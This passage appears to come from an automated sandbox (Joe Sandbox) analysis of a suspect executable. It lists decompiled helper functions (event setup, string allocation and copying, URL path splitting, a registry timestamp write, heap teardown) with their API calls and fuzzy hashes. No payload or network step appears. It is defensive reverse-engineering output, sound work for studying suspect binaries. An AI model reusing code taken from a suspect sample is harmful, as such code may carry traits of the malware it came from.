              				return _t28;
              			}














              0x02ce23c4
              0x02ce23cb
              0x02ce23d9
              0x02ce23dd
              0x02ce23e7
              0x02ce23ec
              0x02ce23f1
              0x02ce23f6
              0x02ce2400
              0x02ce240a
              0x02ce240a
              0x02ce2402
              0x02ce2402
              0x02ce2402
              0x02ce2402
              0x02ce2410
              0x02ce2416
              0x02ce2417
              0x02ce241a
              0x02ce241d
              0x02ce2420
              0x02ce2428
              0x02ce2431
              0x02ce2439
              0x02ce2439
              0x02ce243b
              0x02ce243d
              0x02ce243d
              0x02ce2447

              APIs
                • Part of subcall function 02CE3A63: SysAllocString.OLEAUT32(00000000), ref: 02CE3ABD
                • Part of subcall function 02CE3A63: SysAllocString.OLEAUT32(0070006F), ref: 02CE3AD1
                • Part of subcall function 02CE3A63: SysAllocString.OLEAUT32(00000000), ref: 02CE3AE3
              • memset.NTDLL ref: 02CE23E7
              • GetLastError.KERNEL32 ref: 02CE2433
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: AllocString$ErrorLastmemset
              • String ID: <$@MqtNqt
              • API String ID: 3736384471-349977332
              • Opcode ID: 958d3d5c24f1051c1f6bdbad482e6bb22191daec67cd74b12efcc81e05a7d1ec
              • Instruction ID: ceac81bd6f1421b3b32fc0c75743d20babd84fd13e29a76bb3077de02ed91a11
              • Opcode Fuzzy Hash: 958d3d5c24f1051c1f6bdbad482e6bb22191daec67cd74b12efcc81e05a7d1ec
              • Instruction Fuzzy Hash: 0101ED71D00218ABCF11EFA9D884F9EBBBDAF48744F414526ED05EB250E7709A448F92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE7843(void* __esi) {
              				struct _SECURITY_ATTRIBUTES* _v4;
              				void* _t8;
              				void* _t10;
              
              				_v4 = 0;
              				memset(__esi, 0, 0x38);
              				_t8 = CreateEventA(0, 1, 0, 0);
              				 *(__esi + 0x1c) = _t8;
              				if(_t8 != 0) {
              					_t10 = CreateEventA(0, 1, 1, 0);
              					 *(__esi + 0x20) = _t10;
              					if(_t10 == 0) {
              						CloseHandle( *(__esi + 0x1c));
              					} else {
              						_v4 = 1;
              					}
              				}
              				return _v4;
              			}






              0x02ce784d
              0x02ce7851
              0x02ce7866
              0x02ce7868
              0x02ce786d
              0x02ce7873
              0x02ce7875
              0x02ce787a
              0x02ce7885
              0x02ce787c
              0x02ce787c
              0x02ce787c
              0x02ce787a
              0x02ce7893

              APIs
              • memset.NTDLL ref: 02CE7851
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 02CE7866
              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02CE7873
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02CE3F34,00000000,?), ref: 02CE7885
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: CreateEvent$CloseHandlememset
              • String ID:
              • API String ID: 2812548120-0
              • Opcode ID: 5dc807fab94f9315108a40a873edf04987c66ef98e1531dd9c79a63b0202e32b
              • Instruction ID: 380120b69bd35042abc9e87d4d881c365404a51391918c30274237e2f0d2631d
              • Opcode Fuzzy Hash: 5dc807fab94f9315108a40a873edf04987c66ef98e1531dd9c79a63b0202e32b
              • Instruction Fuzzy Hash: 3DF054B1504308BFD7245F26DCC4C27FB9CEF9519C7114E3EF15791511C675A9188AA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE3230() {
              				void* _t1;
              				intOrPtr _t5;
              				void* _t6;
              				void* _t7;
              				void* _t11;
              
              				_t1 =  *0x2cea30c; // 0x1ac
              				if(_t1 == 0) {
              					L8:
              					return 0;
              				}
              				SetEvent(_t1);
              				_t11 = 0x7fffffff;
              				while(1) {
              					SleepEx(0x64, 1);
              					_t5 =  *0x2cea35c; // 0x0
              					if(_t5 == 0) {
              						break;
              					}
              					_t11 = _t11 - 0x64;
              					if(_t11 > 0) {
              						continue;
              					}
              					break;
              				}
              				_t6 =  *0x2cea30c; // 0x1ac
              				if(_t6 != 0) {
              					CloseHandle(_t6);
              				}
              				_t7 =  *0x2cea2d8; // 0x4e60000
              				if(_t7 != 0) {
              					HeapDestroy(_t7);
              				}
              				goto L8;
              			}








              0x02ce3230
              0x02ce3237
              0x02ce3281
              0x02ce3283
              0x02ce3283
              0x02ce323b
              0x02ce3241
              0x02ce3246
              0x02ce324a
              0x02ce3250
              0x02ce3257
              0x00000000
              0x00000000
              0x02ce3259
              0x02ce325e
              0x00000000
              0x00000000
              0x00000000
              0x02ce325e
              0x02ce3260
              0x02ce3268
              0x02ce326b
              0x02ce326b
              0x02ce3271
              0x02ce3278
              0x02ce327b
              0x02ce327b
              0x00000000

              APIs
              • SetEvent.KERNEL32(000001AC,00000001,02CE109A), ref: 02CE323B
              • SleepEx.KERNEL32(00000064,00000001), ref: 02CE324A
              • CloseHandle.KERNEL32(000001AC), ref: 02CE326B
              • HeapDestroy.KERNEL32(04E60000), ref: 02CE327B
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: CloseDestroyEventHandleHeapSleep
              • String ID:
              • API String ID: 4109453060-0
              • Opcode ID: fd62c692a59f8ef5fdaeab95d97a4d8b97ab028c065a2c259c6a031440ffc258
              • Instruction ID: 2b78635e3d84fad373cf61e54da8d1d1b5b9c176060704eb5ab2bc5acb9d4153
              • Opcode Fuzzy Hash: fd62c692a59f8ef5fdaeab95d97a4d8b97ab028c065a2c259c6a031440ffc258
              • Instruction Fuzzy Hash: 91F03075F803D1DBDF109B769988BA23BE8AB48761B040B90FC06EB2C2DB34E55095A0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE5157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
              				struct _FILETIME _v12;
              				void* _t11;
              				short _t19;
              				void* _t22;
              				void* _t24;
              				void* _t25;
              				short* _t26;
              
              				_t24 = __edx;
              				_t25 = E02CE6536(_t11, _a12);
              				if(_t25 == 0) {
              					_t22 = 8;
              				} else {
              					_t26 = _t25 + _a16 * 2;
              					 *_t26 = 0;
              					_t22 = E02CE330E(__ecx, _a4, _a8, _t25);
              					if(_t22 == 0) {
              						GetSystemTimeAsFileTime( &_v12);
              						_t19 = 0x5f;
              						 *_t26 = _t19;
              						_t22 = E02CE7767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
              					}
              					HeapFree( *0x2cea2d8, 0, _t25);
              				}
              				return _t22;
              			}










              0x02ce5157
              0x02ce5168
              0x02ce516c
              0x02ce51c7
              0x02ce516e
              0x02ce5175
              0x02ce517d
              0x02ce5185
              0x02ce5189
              0x02ce518f
              0x02ce5197
              0x02ce519a
              0x02ce51b2
              0x02ce51b2
              0x02ce51bd
              0x02ce51bd
              0x02ce51ce

              APIs
                • Part of subcall function 02CE6536: lstrlen.KERNEL32(?,00000000,05259DF8,00000000,02CE6F0A,0525A01B,43175AC3,?,?,?,?,43175AC3,00000005,02CEA00C,4D283A53,?), ref: 02CE653D
                • Part of subcall function 02CE6536: mbstowcs.NTDLL ref: 02CE6566
                • Part of subcall function 02CE6536: memset.NTDLL ref: 02CE6578
              • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,05259270), ref: 02CE518F
              • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,05259270), ref: 02CE51BD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
              • String ID: Uqt
              • API String ID: 1500278894-2320327147
              • Opcode ID: 92b9c169360c9795d48afd6c4a884d99021288bfca5c7a8f652baf7e650f5bcd
              • Instruction ID: ce67f2016d997da7be7f8fe7c51ae8791e196c4647012823295876c679ca71ac
              • Opcode Fuzzy Hash: 92b9c169360c9795d48afd6c4a884d99021288bfca5c7a8f652baf7e650f5bcd
              • Instruction Fuzzy Hash: CE01DF32600209BBDF215FA5DC44F9A3F79EF88754F50042AFA01AA160DB72D924DB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 58%
              			E02CE2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
              				intOrPtr* _v8;
              				void* _t17;
              				intOrPtr* _t22;
              				void* _t27;
              				char* _t30;
              				void* _t33;
              				void* _t34;
              				void* _t36;
              				void* _t37;
              				void* _t39;
              				int _t42;
              
              				_t17 = __eax;
              				_t37 = 0;
              				__imp__(_a4, _t33, _t36, _t27, __ecx);
              				_t2 = _t17 + 1; // 0x1
              				_t28 = _t2;
              				_t34 = E02CE33DC(_t2);
              				if(_t34 != 0) {
              					_t30 = E02CE33DC(_t28);
              					if(_t30 == 0) {
              						E02CE61DA(_t34);
              					} else {
              						_t39 = _a4;
              						_t22 = E02CE7AE9(_t39);
              						_v8 = _t22;
              						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
              							_a4 = _t39;
              						} else {
              							_t26 = _t22 + 2;
              							_a4 = _t22 + 2;
              							_t22 = E02CE7AE9(_t26);
              							_v8 = _t22;
              						}
              						if(_t22 == 0) {
              							__imp__(_t34, _a4);
              							 *_t30 = 0x2f;
              							 *((char*)(_t30 + 1)) = 0;
              						} else {
              							_t42 = _t22 - _a4;
              							memcpy(_t34, _a4, _t42);
              							 *((char*)(_t34 + _t42)) = 0;
              							__imp__(_t30, _v8);
              						}
              						 *_a8 = _t34;
              						_t37 = 1;
              						 *_a12 = _t30;
              					}
              				}
              				return _t37;
              			}














              0x02ce2058
              0x02ce2062
              0x02ce2064
              0x02ce206a
              0x02ce206a
              0x02ce2073
              0x02ce2077
              0x02ce2083
              0x02ce2087
              0x02ce20fb
              0x02ce2089
              0x02ce2089
              0x02ce208d
              0x02ce2092
              0x02ce2097
              0x02ce20b1
              0x02ce20a0
              0x02ce20a0
              0x02ce20a4
              0x02ce20a7
              0x02ce20ac
              0x02ce20ac
              0x02ce20b6
              0x02ce20de
              0x02ce20e4
              0x02ce20e7
              0x02ce20b8
              0x02ce20ba
              0x02ce20c2
              0x02ce20cd
              0x02ce20d2
              0x02ce20d2
              0x02ce20ee
              0x02ce20f5
              0x02ce20f6
              0x02ce20f6
              0x02ce2087
              0x02ce2106

              APIs
              • lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02CE51F7,?,?,?,?,00000102,02CE21E7,?,?,747581D0), ref: 02CE2064
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
                • Part of subcall function 02CE7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02CE2092,00000000,00000001,00000001,?,?,02CE51F7,?,?,?,?,00000102), ref: 02CE7AF7
                • Part of subcall function 02CE7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,02CE51F7,?,?,?,?,00000102,02CE21E7,?,?,747581D0,00000000), ref: 02CE7B01
              • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02CE51F7,?,?,?,?,00000102,02CE21E7,?), ref: 02CE20C2
              • lstrcpy.KERNEL32(00000000,00000000), ref: 02CE20D2
              • lstrcpy.KERNEL32(00000000,00000000), ref: 02CE20DE
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
              • String ID:
              • API String ID: 3767559652-0
              • Opcode ID: 35fe18d2a1bc1331408a54f255ad2b0a008d262832332104ed49e340f3493dfd
              • Instruction ID: 235a695d7bce87050d85fef2bb64785346062f0737e37472592b34feb7817385
              • Opcode Fuzzy Hash: 35fe18d2a1bc1331408a54f255ad2b0a008d262832332104ed49e340f3493dfd
              • Instruction Fuzzy Hash: 9D21CD72500255EBCF12AFA4CC44BAABFBDAF45290B148054FD0A9B201DB31DA41DBE2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
              				void* _v8;
              				void* _t18;
              				int _t25;
              				int _t29;
              				int _t34;
              
              				_t29 = lstrlenW(_a4);
              				_t25 = lstrlenW(_a8);
              				_t18 = E02CE33DC(_t25 + _t29 + _t25 + _t29 + 2);
              				_v8 = _t18;
              				if(_t18 != 0) {
              					_t34 = _t29 + _t29;
              					memcpy(_t18, _a4, _t34);
              					_t10 = _t25 + 2; // 0x2
              					memcpy(_v8 + _t34, _a8, _t25 + _t10);
              				}
              				return _v8;
              			}








              0x02ce5df9
              0x02ce5dfd
              0x02ce5e07
              0x02ce5e0c
              0x02ce5e11
              0x02ce5e13
              0x02ce5e1b
              0x02ce5e20
              0x02ce5e2e
              0x02ce5e33
              0x02ce5e3d

              APIs
              • lstrlenW.KERNEL32(004F0053,?,74715520,00000008,05259270,?,02CE52D0,004F0053,05259270,?,?,?,?,?,?,02CE68B6), ref: 02CE5DF4
              • lstrlenW.KERNEL32(02CE52D0,?,02CE52D0,004F0053,05259270,?,?,?,?,?,?,02CE68B6), ref: 02CE5DFB
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • memcpy.NTDLL(00000000,004F0053,747169A0,?,?,02CE52D0,004F0053,05259270,?,?,?,?,?,?,02CE68B6), ref: 02CE5E1B
              • memcpy.NTDLL(747169A0,02CE52D0,00000002,00000000,004F0053,747169A0,?,?,02CE52D0,004F0053,05259270), ref: 02CE5E2E
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: lstrlenmemcpy$AllocateHeap
              • String ID:
              • API String ID: 2411391700-0
              • Opcode ID: 0e6d1384219b1f55b068a3bb972b2c477385292f182e22d4a7668ee990c7a78b
              • Instruction ID: 1ea6ce8f75327f213528bb76dcf98fedf0bcd19b5a3e8e43a8b19f69f87c05ff
              • Opcode Fuzzy Hash: 0e6d1384219b1f55b068a3bb972b2c477385292f182e22d4a7668ee990c7a78b
              • Instruction Fuzzy Hash: 04F04936900119FBCF11EFA8CC84CDE7BADEF483987514062ED09D7201EB35EA119BA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • lstrlen.KERNEL32(05259BF0,00000000,00000000,00000000,02CE3EF9,00000000), ref: 02CE7573
              • lstrlen.KERNEL32(?), ref: 02CE757B
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • lstrcpy.KERNEL32(00000000,05259BF0), ref: 02CE758F
              • lstrcat.KERNEL32(00000000,?), ref: 02CE759A
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
              • String ID:
              • API String ID: 74227042-0
              • Opcode ID: 32a3a93f43075402cb6cb339c89c787d40cd23d9c6edbeb7e21b95b1101fd7cd
              • Instruction ID: 2e5defdb900b8e5fe47e61fcdcd52ee859c5522e67d8a008303f7c9f25a6e928
              • Opcode Fuzzy Hash: 32a3a93f43075402cb6cb339c89c787d40cd23d9c6edbeb7e21b95b1101fd7cd
              • Instruction Fuzzy Hash: A7E06D73901620AB8F11AAA8AC48D6BBBADEE89660304091AF605D7100D73199128BE1
              Uniqueness

              Uniqueness Score: -1.00%